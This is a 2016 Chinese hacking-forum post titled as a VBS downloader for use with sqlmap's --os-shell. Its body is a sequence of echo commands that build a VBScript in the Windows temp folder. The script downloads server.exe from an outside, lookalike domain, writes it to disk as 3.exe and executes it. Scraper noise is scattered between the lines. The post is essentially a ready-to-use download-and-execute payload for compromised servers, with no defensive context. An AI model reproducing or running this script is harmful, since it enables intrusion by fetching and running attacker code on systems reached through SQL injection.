中国网络渗透测试联盟

标题: vbs下载者,适合sqlmap --os-shell使用 [打印本页]
作者: admin    时间: 2016-4-12 16:08
标题: vbs下载者,适合sqlmap --os-shell使用
echo ^Set Post = CreateObject("Msxml2.XMLHTTP")^ >>c:\windows\temp\666999.txt
$ t% B% M7 b! G! ~' P5 Q! L2 Lecho ^Set Shell = CreateObject("Wscript.Shell")^ >>c:\windows\temp\666999.txt
3 s" L5 _) E1 ]2 Qecho ^Post.Open "GET","http://www.baido.hk/server.exe",0^ >>c:\windows\temp\666999.txt( q  S; {5 j+ W; `+ {
echo ^Post.Send()^ >>c:\windows\temp\666999.txt$ L/ }( m4 A' v+ F5 ]  R1 K+ q
echo ^Set aGet = CreateObject("ADODB.Stream")^ >>c:\windows\temp\666999.txt( M' H  M$ D) E8 L
echo ^aGet.Mode = 3^ >>c:\windows\temp\666999.txt
0 o# j  _0 h+ n; h& Gecho ^aGet.Type = 1^ >>c:\windows\temp\666999.txt+ P2 A: e# O9 R  C9 ~0 k
echo ^aGet.Open()^ >>c:\windows\temp\666999.txt
: ~# Z2 G" J: A8 P! b, p2 u& ^echo ^aGet.Write(Post.responseBody)^ >>c:\windows\temp\666999.txt
6 z, U- A3 ?; e# O& oecho ^aGet.SaveToFile "c:\windows\temp\3.exe",2^ >>c:\windows\temp\666999.txt
) \, c" O1 s- w+ Iecho ^wscript.sleep 1000^ >>c:\windows\temp\666999.txt
4 Z9 h/ E+ c( f, Becho ^Shell.Run ("c:\windows\temp\3.exe")^ >>c:\windows\temp\666999.txt
  \+ G0 W% g, a
9 T4 y4 O5 j, S



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2